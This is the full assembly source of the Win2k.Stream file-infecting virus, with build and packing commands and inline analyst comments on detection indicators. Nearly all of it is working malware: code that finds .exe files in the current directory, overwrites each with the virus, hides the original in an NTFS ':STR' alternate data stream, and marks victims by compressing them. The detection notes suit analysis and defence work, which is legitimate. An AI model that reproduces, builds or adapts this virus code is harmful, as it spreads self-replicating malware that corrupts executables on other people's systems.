
📄 w2k.stream河流病毒的源代码 .txt


tasm32 /ml /m9 /q stream 
tlink32 -Tpe -c -x -aa stream,,,import32 
pewrsec stream.exe 
petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe 


And here comes the virus source... 
# 


.586p 
.model flat,stdcall 


include win32api.inc ;include filez 
include useful.inc 

extrn ExitProcess:PROC ;used APIz 
extrn VirtualFree:PROC 
extrn FindFirstFileA:PROC 
extrn FindNextFileA:PROC 
extrn FindClose:PROC 
extrn WinExec:PROC 
extrn GetCommandLineA:PROC 
extrn GetModuleFileNameA:PROC 
extrn DeleteFileA:PROC 
extrn ReadFile:PROC 
extrn CopyFileA:PROC 
extrn WriteFile:PROC 
extrn CreateFileA:PROC 
extrn CloseHandle:PROC 
extrn MessageBoxA:PROC 
extrn GetFileSize:PROC 
extrn VirtualAlloc:PROC 
extrn DeviceIoControl:PROC 
extrn GetFileAttributesA:PROC 
extrn GetTempFileNameA:PROC 
extrn CreateProcessA:PROC 
extrn GetVersion:PROC 


; FSCTL_SET_COMPRESSION is assembled by hand from the CTL_CODE bit fields:
;   9 shl 16  - device type field (file system)
;   3 shl 14  - required-access field (read + write)
;   16 shl 2  - function number field
;   method field (bits 0-1) left at 0
; With shl binding tighter than or this evaluates to 0009C040h.
; Analyst note: a DeviceIoControl call carrying this control code against an
; ordinary .exe is one of the observable behaviours of the sample.
FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2 

;NTFS "set compression" control code (see infect)
; 32-bit STARTUPINFO layout; an instance is handed to CreateProcessA in Start.
STARTUPINFO STRUCT ;used by CreateProcessA API 
cb DWORD ? 
lpReserved DWORD ? 
lpDesktop DWORD ? 
lpTitle DWORD ? 
dwX DWORD ? 
dwY DWORD ? 
dwXSize DWORD ? 
dwYSize DWORD ? 
dwXCountChars DWORD ? 
dwYCountChars DWORD ? 
dwFillAttribute DWORD ? 
dwFlags DWORD ? 
wShowWindow WORD ? 
cbReserved2 WORD ? 
lpReserved2 DWORD ? 
hStdInput DWORD ? 
hStdOutput DWORD ? 
hStdError DWORD ? 
STARTUPINFO ENDS 
; Output structure filled by CreateProcessA (process/thread handles and ids).
PROCESS_INFORMATION STRUCT 
hProcess DWORD ? 
hThread DWORD ? 
dwProcessId DWORD ? 
dwThreadId DWORD ? 
PROCESS_INFORMATION ENDS 


; @pushvar <data-declaration>
; Emits the given data declaration inline in the instruction stream and leaves
; its address on the stack: the CALL pushes the address of the byte that
; follows it (the inline data) and transfers control to next_instr, i.e. past
; the data. The net effect is "push offset <inline variable>".
; Analyst note: because the variable lives inside .code, any API that writes
; through this pointer writes into the code section, so the image only works
; if that section is writable at run time.
@pushvar macro variable, empty ;macro for pushing variables
local next_instr 
ifnb <empty> ;a second macro argument is rejected at assembly time
%out too much arguments in macro '@pushvar' 
.err 
endif 
call next_instr ;pushes the address of the inline data below
variable 
next_instr: 
endm 


.data 

; Static data used by Start and infect.
; Analyst note: the mask below carries no directory component, so the search
; it drives is resolved relative to the process's current directory.
extExe db '*.exe',0 ;search mask 

fHandle dd ? ;file search handle 
file_name db MAX_PATH dup(?) ;path of the running program (GetModuleFileNameA)
db MAX_PATH dup(?) ;unnamed spare buffer directly after file_name; presumably
                   ;headroom for the ":STR" suffix appended in Start - confirm
file_name2 db MAX_PATH dup(?) ;temporary file name (GetTempFileNameA)
db 4 dup (?) 
WFD WIN32_FIND_DATA ? ;win32 find data; WFD_szFileName is edited in place by infect
proc_info PROCESS_INFORMATION <> ;used by CreateProcessA 
startup_info STARTUPINFO <> ;passed to CreateProcessA; no field is assigned in the code shown
.code 
; Start - program entry point.
; Flow, as written below:
;   1. GetVersion; if the low byte (major version) is not 5, go to msgBox.
;      Major version 5 is what Windows 2000 reports; later 5.x releases
;      report the same major number, so this check does not single out 2000.
;   2. GetModuleFileNameA stores the running image's path in file_name.
;   3. FindFirstFileA/FindNextFileA walk "*.exe" and call infect per match.
;   4. ":STR" is appended to file_name and CreateProcessA is asked to run that
;      named stream with the original command line; per the comments in
;      infect, that stream holds the displaced original program.
;   5. ExitProcess(0), or msgBox first if CreateProcessA returned 0.
; Analyst note: a process whose image path ends in ":STR" (an NTFS alternate
; data stream), started by a parent with the same base file name, is the
; run-time signature of step 4.
Start: ;start of virus 
call GetVersion ;get OS version 
cmp al,5 ;AL = major version; 5 = Win2000 
jnz msgBox ;quit if not Win2000 

mov edi,offset file_name 
push MAX_PATH 
push edi 
push 0 ;hModule = 0 -> the current process image
call GetModuleFileNameA ;get path+filename of actual 
;program 
push offset WFD 
push offset extExe 
call FindFirstFileA ;find first file to infect 
test eax,eax ;only a zero return skips the loop
jz end_host 
mov [fHandle],eax ;save handle 


search_loop: 
call infect ;try to infect file 

push offset WFD 
push dword ptr [fHandle] 
call FindNextFileA ;try to find next file 
test eax,eax 
jne search_loop ;and infect it 

push dword ptr [fHandle] 
call FindClose ;close file search handle 

end_host: 
mov esi,offset file_name ;get our filename 
push esi ;keep the start of the name for CreateProcessA
@endsz ;macro from useful.inc (not shown); presumably leaves ESI just
       ;past the terminating NUL - confirm against the include file
dec esi ;back onto the NUL
mov edi,esi 
mov eax,"RTS:" ;append there :"STR" stream 
stosd ;name 
pop esi ;ESI = file_name, now "<path>:STR"

call GetCommandLineA ;get command line 
xchg eax,edi ;to EDI 

;esi - app name 
;edi - cmd line 
xor eax,eax 
push offset proc_info 
push offset startup_info 
push eax 
push eax 
push eax 
push eax 
push eax 
push eax 
push edi 
push esi 
call CreateProcessA ;run the program stored in the :STR stream
xchg eax,ecx 
jecxz msgBox ;if error, show message box 

end_app: 
push 0 
call ExitProcess ;exit 

; msgBox - reached when the OS version check fails or CreateProcessA returns 0.
; Calls MessageBoxA(hWnd = 0, text, caption, 1000h) and then jumps to end_app.
; 1000h is the MB_SYSTEMMODAL style bit. @pushsz comes from useful.inc (not
; shown); presumably it pushes the address of the inline string - confirm.
; Analyst note: the two string literals below are fixed, so they serve as
; static indicators when scanning files or memory for this sample.
msgBox: push 1000h ;uType
@pushsz "Win2k.Stream by Benny/29A & Ratter" ;lpCaption
@pushsz "This cell has been infected by [Win2k.Stream] virus!" 
push 0 ;hWnd; the text above is lpText
call MessageBoxA 
jmp end_app 


; infect - processes the file currently described by WFD.
; In:  WFD.WFD_szFileName = file found by the search loop in Start
; Uses EBX (file handle from Create_File), ESI, EDI, EAX, ECX.
;
; What the code below does, in order:
;   1. Skips the file if GetFileAttributesA reports bit 800h
;      (FILE_ATTRIBUTE_COMPRESSED). A failed call returns FFFFFFFFh, which
;      also has that bit set, so it is skipped as well.
;   2. Opens the file and sets NTFS compression on it (the marker tested in 1).
;   3. Copies the file to a temporary name (prefix "str", directory ".").
;   4. Copies the running image over the file's unnamed data stream.
;   5. Reads the temporary copy into memory, deletes it, and writes the
;      content to "<file>:STR", an NTFS alternate data stream.
;
; Analyst notes (detection / response):
;   - Affected files carry the compressed attribute, a named stream "STR",
;     and an unnamed stream that is a copy of the same image in every file.
;     Stream enumeration (e.g. "dir /r", Sysinternals streams) and
;     file-integrity monitoring on executables both expose this.
;   - A short-lived "str*.tmp" file is created and deleted in the current
;     directory for each file processed.
;   - The temporary copy is deleted before the ":STR" stream is created and
;     written, and the WriteFile result does not alter the flow; recovery
;     should not assume the stream always holds a complete original.
infect: push offset [WFD.WFD_szFileName] 
call GetFileAttributesA ;check if the file is NTFS 
test eax,800h ;compressed = already infected 
jz next_infect 
ret ;quit then 

next_infect: 
push offset [WFD.WFD_szFileName] 
mov byte ptr [flagz],OPEN_EXISTING ;patches the immediate inside Create_File
call Create_File ;open found program 
jz infect_end ;ZF=1 -> handle was -1

;DeviceIoControl(EBX, FSCTL_SET_COMPRESSION, &in, 4, NULL, 0, &returned, NULL)
xor eax,eax 
push eax 
@pushvar <dd ?> ;inline dword receiving the byte count
push eax 
push eax 
push 4 
@pushvar <dd 1> ;default compression 
push FSCTL_SET_COMPRESSION 
push ebx ;NTFS compress it = 
call DeviceIoControl ;mark as already infected 
; = and save disk space 
;(return value is not checked)
push ebx 
call CloseHandle ;close file handle 

;GetTempFileNameA(".", "str", 0, file_name2)
mov esi,offset file_name2 
push esi 
push 0 
@pushsz "str" 
@pushsz "." 
call GetTempFileNameA ;create name for temp file 
test eax,eax 
jz infect_end 

;CopyFileA(found file -> temp file, bFailIfExists = 0)
mov edi,offset [WFD.WFD_szFileName] 
push 0 
push esi 
push edi 
call CopyFileA ;copy there victim program 
test eax,eax 
jz infect_end 


;CopyFileA(file_name -> found file, bFailIfExists = 0); result not checked
push 0 
push edi 
push offset file_name 
call CopyFileA ;copy ourself to victim program 

push esi ;temp file name = argument for the Create_File call below

mov esi,edi 
@endsz ;useful.inc macro (not shown); presumably ESI ends just past the NUL
xchg esi,edi 
dec edi ;EDI -> terminating NUL of WFD_szFileName
mov eax,"RTS:" ;append :"STR" stream to 
stosd ;victim program filename 
xor al,al 
stosb ;re-terminate: WFD_szFileName is now "<file>:STR"

call Create_File ;opens the temp copy (argument pushed above)
jz infect_end 

push 0 
push ebx 
call GetFileSize ;get its size 
xchg eax,edi ;EDI = size

push PAGE_READWRITE 
push MEM_COMMIT or MEM_RESERVE 
push edi 
push 0 
call VirtualAlloc ;allocate enough memory 
test eax,eax ;for file content 
jz infect_end_handle 

xchg eax,esi ;ESI = buffer

;ReadFile(EBX, ESI, EDI, &file_size, NULL)
xor eax,eax 
push eax 
@pushvar <file_size dd ?> ;inline dword in .code; receives bytes read
push edi 
push esi 
push ebx 
call ReadFile ;read file content to 
test eax,eax ;allocated memory 
jz infect_end_handle 

push ebx 
call CloseHandle ;close its file handle 

push offset file_name2 
call DeleteFileA ;delete temporary file 

mov byte ptr [flagz],CREATE_ALWAYS ;patch the disposition again
push offset [WFD.WFD_szFileName] 
call Create_File ;open stream 
jz infect_end_dealloc 

;WriteFile(EBX, ESI, [file_size], &file_size, NULL)
push 0 
mov ecx,offset file_size 
push ecx 
push dword ptr [ecx] 
push esi 
push ebx 
call WriteFile ;write there victim program 
test eax,eax 
jz infect_end_handle ;both outcomes continue at the next label

infect_end_handle: 
push ebx 
call CloseHandle ;close its file handle 
infect_end_dealloc: 
push MEM_DECOMMIT 
push dword ptr [file_size] 
push esi 
call VirtualFree ;free allocated memory 
push MEM_RELEASE 
push 0 
push esi 
call VirtualFree ;release reserved part of mem 
infect_end: 
ret 

; Create_File - wrapper around CreateFileA.
; In:    [esp+4] = pointer to the file name (removed by "retn 4")
;        flagz   = creation disposition, written by the caller beforehand
; Out:   EBX = handle returned by CreateFileA
;        ZF  = 1 when that handle is -1 (INVALID_HANDLE_VALUE), else 0
; Clobb: EAX (xchg, then lahf overwrites AH)
; Call made: CreateFileA(name, GENERIC_READ or GENERIC_WRITE, 0, NULL,
;                        flagz, 0, NULL)
; Analyst note: the byte 6Ah is the opcode of "push imm8" and flagz is its
; immediate, so callers select the disposition by rewriting an instruction
; operand - self-modifying code that needs a writable code section. The build
; step "pewrsec stream.exe" presumably provides that; the tool is not shown.
; A writable+executable code section is itself a static anomaly worth flagging.
; [esp+4] - file_name 
Create_File: ;proc for opening file 
xor eax,eax 
push eax ;hTemplateFile = 0
push eax ;dwFlagsAndAttributes = 0
db 6ah ;opcode byte of push imm8 ...
flagz db OPEN_EXISTING ;... and its patchable immediate (dwCreationDisposition)
push eax ;lpSecurityAttributes = 0
push eax ;dwShareMode = 0
push GENERIC_READ or GENERIC_WRITE 
push dword ptr [esp+1ch] ;six pushes (18h) + return address -> caller's argument
call CreateFileA ;open file 
xchg eax,ebx ;handle to EBX 
inc ebx ;is EBX -1? 
lahf ;store flags 
dec ebx ;correct EBX 
sahf ;restore flags 
retn 4 ;quit from proc 

end Start ;end of virus  
